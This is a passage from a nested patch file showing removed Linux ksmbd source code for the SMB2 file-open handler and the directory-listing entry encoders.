+-				rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-			}
+-		} else {
+-			if (file_present && S_ISDIR(d_inode(path.dentry)->i_mode) &&
+-			    s_type == DATA_STREAM) {
+-				rc = -EIO;
+-				rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-			}
+-		}
+-
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE &&
+-		    req->FileAttributes & FILE_ATTRIBUTE_NORMAL_LE) {
+-			rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-			rc = -EIO;
+-		}
+-
+-		if (rc < 0)
+-			goto err_out;
+-	}
+-
+-	if (file_present && req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE &&
+-	    S_ISDIR(d_inode(path.dentry)->i_mode) &&
+-	    !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-		ksmbd_debug(SMB, "open() argument is a directory: %s, %x\n",
+-			    name, req->CreateOptions);
+-		rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-		rc = -EIO;
+-		goto err_out;
+-	}
+-
+-	if (file_present && (req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
+-	    !(req->CreateDisposition == FILE_CREATE_LE) &&
+-	    !S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-		rc = -EIO;
+-		goto err_out;
+-	}
+-
+-	if (!stream_name && file_present &&
+-	    req->CreateDisposition == FILE_CREATE_LE) {
+-		rc = -EEXIST;
+-		goto err_out;
+-	}
+-
+-	daccess = smb_map_generic_desired_access(req->DesiredAccess);
+-
+-	if (file_present && !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-		rc = smb_check_perm_dacl(conn, &path, &daccess,
+-					 sess->user->uid);
+-		if (rc)
+-			goto err_out;
+-	}
+-
+-	if (daccess & FILE_MAXIMAL_ACCESS_LE) {
+-		if (!file_present) {
+-			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
+-		} else {
+-			rc = ksmbd_vfs_query_maximal_access(user_ns,
+-							    path.dentry,
+-							    &daccess);
+-			if (rc)
+-				goto err_out;
+-			already_permitted = true;
+-		}
+-		maximal_access = daccess;
+-	}
+-
+-	open_flags = smb2_create_open_flags(file_present, daccess,
+-					    req->CreateDisposition,
+-					    &may_flags);
+-
+-	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		if (open_flags & O_CREAT) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-	}
+-
+-	/*create file if not present */
+-	if (!file_present) {
+-		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
+-				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
+-		if (rc) {
+-			if (rc == -ENOENT) {
+-				rc = -EIO;
+-				rsp->hdr.Status = STATUS_OBJECT_PATH_NOT_FOUND;
+-			}
+-			goto err_out;
+-		}
+-
+-		created = true;
+-		user_ns = mnt_user_ns(path.mnt);
+-		if (ea_buf) {
+-			if (le32_to_cpu(ea_buf->ccontext.DataLength) <
+-			    sizeof(struct smb2_ea_info)) {
+-				rc = -EINVAL;
+-				goto err_out;
+-			}
+-
+-			rc = smb2_set_ea(&ea_buf->ea,
+-					 le32_to_cpu(ea_buf->ccontext.DataLength),
+-					 &path);
+-			if (rc == -EOPNOTSUPP)
+-				rc = 0;
+-			else if (rc)
+-				goto err_out;
+-		}
+-	} else if (!already_permitted) {
+-		/* FILE_READ_ATTRIBUTE is allowed without inode_permission,
+-		 * because execute(search) permission on a parent directory,
+-		 * is already granted.
+-		 */
+-		if (daccess & ~(FILE_READ_ATTRIBUTES_LE | FILE_READ_CONTROL_LE)) {
+-			rc = inode_permission(user_ns,
+-					      d_inode(path.dentry),
+-					      may_flags);
+-			if (rc)
+-				goto err_out;
+-
+-			if ((daccess & FILE_DELETE_LE) ||
+-			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-				rc = ksmbd_vfs_may_delete(user_ns,
+-							  path.dentry);
+-				if (rc)
+-					goto err_out;
+-			}
+-		}
+-	}
+-
+-	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
+-	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
+-		rc = -EBUSY;
+-		goto err_out;
+-	}
+-
+-	rc = 0;
+-	filp = dentry_open(&path, open_flags, current_cred());
+-	if (IS_ERR(filp)) {
+-		rc = PTR_ERR(filp);
+-		pr_err("dentry open for dir failed, rc %d\n", rc);
+-		goto err_out;
+-	}
+-
+-	if (file_present) {
+-		if (!(open_flags & O_TRUNC))
+-			file_info = FILE_OPENED;
+-		else
+-			file_info = FILE_OVERWRITTEN;
+-
+-		if ((req->CreateDisposition & FILE_CREATE_MASK_LE) ==
+-		    FILE_SUPERSEDE_LE)
+-			file_info = FILE_SUPERSEDED;
+-	} else if (open_flags & O_CREAT) {
+-		file_info = FILE_CREATED;
+-	}
+-
+-	ksmbd_vfs_set_fadvise(filp, req->CreateOptions);
+-
+-	/* Obtain Volatile-ID */
+-	fp = ksmbd_open_fd(work, filp);
+-	if (IS_ERR(fp)) {
+-		fput(filp);
+-		rc = PTR_ERR(fp);
+-		fp = NULL;
+-		goto err_out;
+-	}
+-
+-	/* Get Persistent-ID */
+-	ksmbd_open_durable_fd(fp);
+-	if (!has_file_id(fp->persistent_id)) {
+-		rc = -ENOMEM;
+-		goto err_out;
+-	}
+-
+-	fp->cdoption = req->CreateDisposition;
+-	fp->daccess = daccess;
+-	fp->saccess = req->ShareAccess;
+-	fp->coption = req->CreateOptions;
+-
+-	/* Set default windows and posix acls if creating new file */
+-	if (created) {
+-		int posix_acl_rc;
+-		struct inode *inode = d_inode(path.dentry);
+-
+-		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
+-							   inode,
+-							   d_inode(path.dentry->d_parent));
+-		if (posix_acl_rc)
+-			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
+-
+-		if (test_share_config_flag(work->tcon->share_conf,
+-					   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-			rc = smb_inherit_dacl(conn, &path, sess->user->uid,
+-					      sess->user->gid);
+-		}
+-
+-		if (rc) {
+-			rc = smb2_create_sd_buffer(work, req, &path);
+-			if (rc) {
+-				if (posix_acl_rc)
+-					ksmbd_vfs_set_init_posix_acl(user_ns,
+-								     inode);
+-
+-				if (test_share_config_flag(work->tcon->share_conf,
+-							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-					struct smb_fattr fattr;
+-					struct smb_ntsd *pntsd;
+-					int pntsd_size, ace_num = 0;
+-
+-					ksmbd_acls_fattr(&fattr, user_ns, inode);
+-					if (fattr.cf_acls)
+-						ace_num = fattr.cf_acls->a_count;
+-					if (fattr.cf_dacls)
+-						ace_num += fattr.cf_dacls->a_count;
+-
+-					pntsd = kmalloc(sizeof(struct smb_ntsd) +
+-							sizeof(struct smb_sid) * 3 +
+-							sizeof(struct smb_acl) +
+-							sizeof(struct smb_ace) * ace_num * 2,
+-							GFP_KERNEL);
+-					if (!pntsd) {
+-						posix_acl_release(fattr.cf_acls);
+-						posix_acl_release(fattr.cf_dacls);
+-						goto err_out;
+-					}
+-
+-					rc = build_sec_desc(user_ns,
+-							    pntsd, NULL, 0,
+-							    OWNER_SECINFO |
+-							    GROUP_SECINFO |
+-							    DACL_SECINFO,
+-							    &pntsd_size, &fattr);
+-					posix_acl_release(fattr.cf_acls);
+-					posix_acl_release(fattr.cf_dacls);
+-					if (rc) {
+-						kfree(pntsd);
+-						goto err_out;
+-					}
+-
+-					rc = ksmbd_vfs_set_sd_xattr(conn,
+-								    user_ns,
+-								    path.dentry,
+-								    pntsd,
+-								    pntsd_size);
+-					kfree(pntsd);
+-					if (rc)
+-						pr_err("failed to store ntacl in xattr : %d\n",
+-						       rc);
+-				}
+-			}
+-		}
+-		rc = 0;
+-	}
+-
+-	if (stream_name) {
+-		rc = smb2_set_stream_name_xattr(&path,
+-						fp,
+-						stream_name,
+-						s_type);
+-		if (rc)
+-			goto err_out;
+-		file_info = FILE_CREATED;
+-	}
+-
+-	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
+-			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
+-	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
+-	    !fp->attrib_only && !stream_name) {
+-		smb_break_all_oplock(work, fp);
+-		need_truncate = 1;
+-	}
+-
+-	/* fp should be searchable through ksmbd_inode.m_fp_list
+-	 * after daccess, saccess, attrib_only, and stream are
+-	 * initialized.
+-	 */
+-	write_lock(&fp->f_ci->m_lock);
+-	list_add(&fp->node, &fp->f_ci->m_fp_list);
+-	write_unlock(&fp->f_ci->m_lock);
+-
+-	/* Check delete pending among previous fp before oplock break */
+-	if (ksmbd_inode_pending_delete(fp)) {
+-		rc = -EBUSY;
+-		goto err_out;
+-	}
+-
+-	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
+-	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
+-	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
+-	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
+-		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
+-			rc = share_ret;
+-			goto err_out;
+-		}
+-	} else {
+-		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
+-			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
+-			ksmbd_debug(SMB,
+-				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
+-				    name, req_op_level, lc->req_state);
+-			rc = find_same_lease_key(sess, fp->f_ci, lc);
+-			if (rc)
+-				goto err_out;
+-		} else if (open_flags == O_RDONLY &&
+-			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
+-			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
+-			req_op_level = SMB2_OPLOCK_LEVEL_II;
+-
+-		rc = smb_grant_oplock(work, req_op_level,
+-				      fp->persistent_id, fp,
+-				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
+-				      lc, share_ret);
+-		if (rc < 0)
+-			goto err_out;
+-	}
+-
+-	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
+-		ksmbd_fd_set_delete_on_close(fp, file_info);
+-
+-	if (need_truncate) {
+-		rc = smb2_create_truncate(&path);
+-		if (rc)
+-			goto err_out;
+-	}
+-
+-	if (req->CreateContextsOffset) {
+-		struct create_alloc_size_req *az_req;
+-
+-		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
+-					SMB2_CREATE_ALLOCATION_SIZE, 4);
+-		if (IS_ERR(az_req)) {
+-			rc = PTR_ERR(az_req);
+-			goto err_out;
+-		} else if (az_req) {
+-			loff_t alloc_size;
+-			int err;
+-
+-			if (le16_to_cpu(az_req->ccontext.DataOffset) +
+-			    le32_to_cpu(az_req->ccontext.DataLength) <
+-			    sizeof(struct create_alloc_size_req)) {
+-				rc = -EINVAL;
+-				goto err_out;
+-			}
+-			alloc_size = le64_to_cpu(az_req->AllocationSize);
+-			ksmbd_debug(SMB,
+-				    "request smb2 create allocate size : %llu\n",
+-				    alloc_size);
+-			smb_break_all_levII_oplock(work, fp, 1);
+-			err = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+-					    alloc_size);
+-			if (err < 0)
+-				ksmbd_debug(SMB,
+-					    "vfs_fallocate is failed : %d\n",
+-					    err);
+-		}
+-
+-		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out;
+-		} else if (context) {
+-			ksmbd_debug(SMB, "get query on disk id context\n");
+-			query_disk_id = 1;
+-		}
+-	}
+-
+-	rc = ksmbd_vfs_getattr(&path, &stat);
+-	if (rc)
+-		goto err_out;
+-
+-	if (stat.result_mask & STATX_BTIME)
+-		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
+-	else
+-		fp->create_time = ksmbd_UnixTimeToNT(stat.ctime);
+-	if (req->FileAttributes || fp->f_ci->m_fattr == 0)
+-		fp->f_ci->m_fattr =
+-			cpu_to_le32(smb2_get_dos_mode(&stat, le32_to_cpu(req->FileAttributes)));
+-
+-	if (!created)
+-		smb2_update_xattrs(tcon, &path, fp);
+-	else
+-		smb2_new_xattrs(tcon, &path, fp);
+-
+-	memcpy(fp->client_guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
+-
+-	rsp->StructureSize = cpu_to_le16(89);
+-	rcu_read_lock();
+-	opinfo = rcu_dereference(fp->f_opinfo);
+-	rsp->OplockLevel = opinfo != NULL ? opinfo->level : 0;
+-	rcu_read_unlock();
+-	rsp->Flags = 0;
+-	rsp->CreateAction = cpu_to_le32(file_info);
+-	rsp->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	rsp->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	rsp->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	rsp->ChangeTime = cpu_to_le64(time);
+-	rsp->AllocationSize = S_ISDIR(stat.mode) ? 0 :
+-		cpu_to_le64(stat.blocks << 9);
+-	rsp->EndofFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	rsp->FileAttributes = fp->f_ci->m_fattr;
+-
+-	rsp->Reserved2 = 0;
+-
+-	rsp->PersistentFileId = fp->persistent_id;
+-	rsp->VolatileFileId = fp->volatile_id;
+-
+-	rsp->CreateContextsOffset = 0;
+-	rsp->CreateContextsLength = 0;
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
+-
+-	/* If lease is request send lease context response */
+-	if (opinfo && opinfo->is_lease) {
+-		struct create_context *lease_ccontext;
+-
+-		ksmbd_debug(SMB, "lease granted on(%s) lease state 0x%x\n",
+-			    name, opinfo->o_lease->state);
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
+-
+-		lease_ccontext = (struct create_context *)rsp->Buffer;
+-		contxt_cnt++;
+-		create_lease_buf(rsp->Buffer, opinfo->o_lease);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_lease_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_lease_size);
+-		next_ptr = &lease_ccontext->Next;
+-		next_off = conn->vals->create_lease_size;
+-	}
+-
+-	if (maximal_access_ctxt) {
+-		struct create_context *mxac_ccontext;
+-
+-		if (maximal_access == 0)
+-			ksmbd_vfs_query_maximal_access(user_ns,
+-						       path.dentry,
+-						       &maximal_access);
+-		mxac_ccontext = (struct create_context *)(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength));
+-		contxt_cnt++;
+-		create_mxac_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				le32_to_cpu(maximal_access));
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_mxac_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_mxac_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-		next_ptr = &mxac_ccontext->Next;
+-		next_off = conn->vals->create_mxac_size;
+-	}
+-
+-	if (query_disk_id) {
+-		struct create_context *disk_id_ccontext;
+-
+-		disk_id_ccontext = (struct create_context *)(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength));
+-		contxt_cnt++;
+-		create_disk_id_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				stat.ino, tcon->id);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_disk_id_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_disk_id_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-		next_ptr = &disk_id_ccontext->Next;
+-		next_off = conn->vals->create_disk_id_size;
+-	}
+-
+-	if (posix_ctxt) {
+-		contxt_cnt++;
+-		create_posix_rsp_buf(rsp->Buffer +
+-				le32_to_cpu(rsp->CreateContextsLength),
+-				fp);
+-		le32_add_cpu(&rsp->CreateContextsLength,
+-			     conn->vals->create_posix_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_posix_size);
+-		if (next_ptr)
+-			*next_ptr = cpu_to_le32(next_off);
+-	}
+-
+-	if (contxt_cnt > 0) {
+-		rsp->CreateContextsOffset =
+-			cpu_to_le32(offsetof(struct smb2_create_rsp, Buffer));
+-	}
+-
+-err_out:
+-	if (file_present || created)
+-		path_put(&path);
+-	ksmbd_revert_fsids(work);
+-err_out1:
+-	if (rc) {
+-		if (rc == -EINVAL)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		else if (rc == -EOPNOTSUPP)
+-			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-		else if (rc == -EACCES || rc == -ESTALE || rc == -EXDEV)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (rc == -ENOENT)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
+-		else if (rc == -EPERM)
+-			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
+-		else if (rc == -EBUSY)
+-			rsp->hdr.Status = STATUS_DELETE_PENDING;
+-		else if (rc == -EBADF)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
+-		else if (rc == -ENOEXEC)
+-			rsp->hdr.Status = STATUS_DUPLICATE_OBJECTID;
+-		else if (rc == -ENXIO)
+-			rsp->hdr.Status = STATUS_NO_SUCH_DEVICE;
+-		else if (rc == -EEXIST)
+-			rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
+-		else if (rc == -EMFILE)
+-			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-		if (!rsp->hdr.Status)
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-
+-		if (fp)
+-			ksmbd_fd_put(work, fp);
+-		smb2_set_err_rsp(work);
+-		ksmbd_debug(SMB, "Error response: %x\n", rsp->hdr.Status);
+-	}
+-
+-	kfree(name);
+-	kfree(lc);
+-
+-	return 0;
+-}
+-
+-static int readdir_info_level_struct_sz(int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_full_directory_info);
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_both_directory_info);
+-	case FILE_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_directory_info);
+-	case FILE_NAMES_INFORMATION:
+-		return sizeof(struct file_names_info);
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_id_full_dir_info);
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-		return sizeof(struct file_id_both_directory_info);
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		return sizeof(struct smb2_posix_info);
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
+-static int dentry_name(struct ksmbd_dir_info *d_info, int info_level)
+-{
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(ffdinfo->NextEntryOffset);
+-		d_info->name = ffdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(ffdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fbdinfo->NextEntryOffset);
+-		d_info->name = fbdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fbdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fdinfo->NextEntryOffset);
+-		d_info->name = fdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fninfo->NextEntryOffset);
+-		d_info->name = fninfo->FileName;
+-		d_info->name_len = le32_to_cpu(fninfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(dinfo->NextEntryOffset);
+-		d_info->name = dinfo->FileName;
+-		d_info->name_len = le32_to_cpu(dinfo->FileNameLength);
+-		return 0;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(fibdinfo->NextEntryOffset);
+-		d_info->name = fibdinfo->FileName;
+-		d_info->name_len = le32_to_cpu(fibdinfo->FileNameLength);
+-		return 0;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-
+-		posix_info = (struct smb2_posix_info *)d_info->rptr;
+-		d_info->rptr += le32_to_cpu(posix_info->NextEntryOffset);
+-		d_info->name = posix_info->name;
+-		d_info->name_len = le32_to_cpu(posix_info->name_len);
+-		return 0;
+-	}
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-/**
+- * smb2_populate_readdir_entry() - encode directory entry in smb2 response
+- * buffer
+- * @conn:	connection instance
+- * @info_level:	smb information level
+- * @d_info:	structure included variables for query dir
+- * @ksmbd_kstat:	ksmbd wrapper of dirent stat information
+- *
+- * if directory has many entries, find first can't read it fully.
+- * find next might be called multiple times to read remaining dir entries
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
+-				       struct ksmbd_dir_info *d_info,
+-				       struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	int next_entry_offset = 0;
+-	char *conv_name;
+-	int conv_len;
+-	void *kstat;
+-	int struct_sz, rc = 0;
+-
+-	conv_name = ksmbd_convert_dir_info_name(d_info,
+-						conn->local_nls,
+-						&conv_len);
+-	if (!conv_name)
+-		return -ENOMEM;
+-
+-	/* Somehow the name has only terminating NULL bytes */
+-	if (conv_len < 0) {
+-		rc = -EINVAL;
+-		goto free_conv_name;
+-	}
+-
+-	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
+-	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
+-	d_info->last_entry_off_align = next_entry_offset - struct_sz;
+-
+-	if (next_entry_offset > d_info->out_buf_len) {
+-		d_info->out_buf_len = 0;
+-		rc = -ENOSPC;
+-		goto free_conv_name;
+-	}
+-
+-	kstat = d_info->wptr;
+-	if (info_level != FILE_NAMES_INFORMATION)
+-		kstat = ksmbd_vfs_init_kstat(&d_info->wptr, ksmbd_kstat);
+-
+-	switch (info_level) {
+-	case FILE_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_full_directory_info *ffdinfo;
+-
+-		ffdinfo = (struct file_full_directory_info *)kstat;
+-		ffdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		ffdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (ffdinfo->EaSize)
+-			ffdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			ffdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(ffdinfo->FileName, conv_name, conv_len);
+-		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_both_directory_info *fbdinfo;
+-
+-		fbdinfo = (struct file_both_directory_info *)kstat;
+-		fbdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		fbdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (fbdinfo->EaSize)
+-			fbdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		fbdinfo->ShortNameLength = 0;
+-		fbdinfo->Reserved = 0;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fbdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fbdinfo->FileName, conv_name, conv_len);
+-		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_DIRECTORY_INFORMATION:
+-	{
+-		struct file_directory_info *fdinfo;
+-
+-		fdinfo = (struct file_directory_info *)kstat;
+-		fdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fdinfo->FileName, conv_name, conv_len);
+-		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILE_NAMES_INFORMATION:
+-	{
+-		struct file_names_info *fninfo;
+-
+-		fninfo = (struct file_names_info *)kstat;
+-		fninfo->FileNameLength = cpu_to_le32(conv_len);
+-		memcpy(fninfo->FileName, conv_name, conv_len);
+-		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_FULL_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_full_dir_info *dinfo;
+-
+-		dinfo = (struct file_id_full_dir_info *)kstat;
+-		dinfo->FileNameLength = cpu_to_le32(conv_len);
+-		dinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (dinfo->EaSize)
+-			dinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		dinfo->Reserved = 0;
+-		dinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			dinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(dinfo->FileName, conv_name, conv_len);
+-		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case FILEID_BOTH_DIRECTORY_INFORMATION:
+-	{
+-		struct file_id_both_directory_info *fibdinfo;
+-
+-		fibdinfo = (struct file_id_both_directory_info *)kstat;
+-		fibdinfo->FileNameLength = cpu_to_le32(conv_len);
+-		fibdinfo->EaSize =
+-			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
+-		if (fibdinfo->EaSize)
+-			fibdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
+-		fibdinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		fibdinfo->ShortNameLength = 0;
+-		fibdinfo->Reserved = 0;
+-		fibdinfo->Reserved2 = cpu_to_le16(0);
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			fibdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		memcpy(fibdinfo->FileName, conv_name, conv_len);
+-		fibdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
+-		break;
+-	}
+-	case SMB_FIND_FILE_POSIX_INFO:
+-	{
+-		struct smb2_posix_info *posix_info;
+-		u64 time;
+-
+-		posix_info = (struct smb2_posix_info *)kstat;
+-		posix_info->Ignored = 0;
+-		posix_info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
+-		posix_info->ChangeTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->atime);
+-		posix_info->LastAccessTime = cpu_to_le64(time);
+-		time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->mtime);
+-		posix_info->LastWriteTime = cpu_to_le64(time);
+-		posix_info->EndOfFile = cpu_to_le64(ksmbd_kstat->kstat->size);
+-		posix_info->AllocationSize = cpu_to_le64(ksmbd_kstat->kstat->blocks << 9);
+-		posix_info->DeviceId = cpu_to_le32(ksmbd_kstat->kstat->rdev);
+-		posix_info->HardLinks = cpu_to_le32(ksmbd_kstat->kstat->nlink);
+-		posix_info->Mode = cpu_to_le32(ksmbd_kstat->kstat->mode & 0777);
+-		posix_info->Inode = cpu_to_le64(ksmbd_kstat->kstat->ino);
+-		posix_info->DosAttributes =
+-			S_ISDIR(ksmbd_kstat->kstat->mode) ?
+-				FILE_ATTRIBUTE_DIRECTORY_LE : FILE_ATTRIBUTE_ARCHIVE_LE;
+-		if (d_info->hide_dot_file && d_info->name[0] == '.')
+-			posix_info->DosAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
+-		/*
+-		 * SidBuffer(32) contain two sids(Domain sid(16), UNIX group sid(16)).
